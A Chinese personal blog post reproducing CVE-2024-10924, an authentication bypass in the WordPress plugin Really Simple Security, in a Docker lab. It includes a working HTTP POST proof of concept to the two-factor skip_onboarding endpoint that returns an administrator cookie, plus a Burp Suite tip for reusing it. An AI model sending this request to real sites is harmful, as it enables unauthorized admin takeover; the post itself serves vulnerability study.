博主 小野博客
小野博客 小野(Hirono)博客的个人网站,主要讲述关于小野的一些陈芝麻烂谷子事。网络、生活、我的主张,也是一个自留地
菜单

影响4百万用户Wordpress的任意用户登录复现及环境(CVE-2024-10924)

WordPress 插件 “Really Simple Security” 中的一个严重漏洞(CVE-2024-10924)允许未经身份验证的攻击者绕过身份验证并获取管理员权限。据悉,该漏洞在全球范围内共影响了四百万WordPress站点。
📟前端日记 共 1150 字 计 620 次阅读 需要 1 分钟
本文最后更新于2025年3月19日,已经过了291天没有更新,若内容或图片失效,请留言反馈

测试环境

环境地址 WordPress/CVE-2024-10924
(该裤已经删除)

安装教程

  1. 执行如下命令启动一个WordPress漏洞环境:
docker compose up -d

访问 http://你的安装地址/wp-admin/install.php 进行WordPress安装。

  1. 安装完成之后使用创建的管理员账号登录。登录后访问 http://你的安装地址/wp-admin/plugins.php,点击“启用”激活Really Simple Security插件。(这里不能点“启动自动更新”,会升级成无漏洞版本)。

接着会跳出SSL激活选项,这里我们点击“Cancel”。

  1. 接着直接在当前页面点击“Settings”。
  2. "Login Protection" > "Two-Factor Authentication",接着如图顺序点击。
  3. 至此,CVE-2024-10924漏洞环境安装完成。

漏洞复现

  1. 正常访问后台登陆页面 http://你的地址/wp-login.php 发现处于未登录状态。
  2. 执行以下POC,其中user_id的值是你要登录的用户(一般管理员id是1)。
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "12345678910",
    "redirect_to": "/wp-admin/"
}
  1. 执行结果会返回Cookie值,把这个cookie放到正常请求包里即可使用admin的身份登录后台。
  2. 但这里会发现一个问题:这个cookie必须在每次请求都手动添加,非常麻烦。于是我们可以使用burpsuite中的“Match and replace rules”设置来在每一次请求包中添加Cookie,实现在后台顺滑地进行操作。

结束

昵称
邮箱
站点
填写信息
返回
发表
返回留言
  1. 头像 龙笑天
    @
    龙笑天
    能不用插件就不插件~😊
    · Windows · 火狐浏览器 · 中国广东省联通
  2. 头像 行素霞
    @
    行素霞
    lz太强了
    · Windows · Chrome · 中国上海电信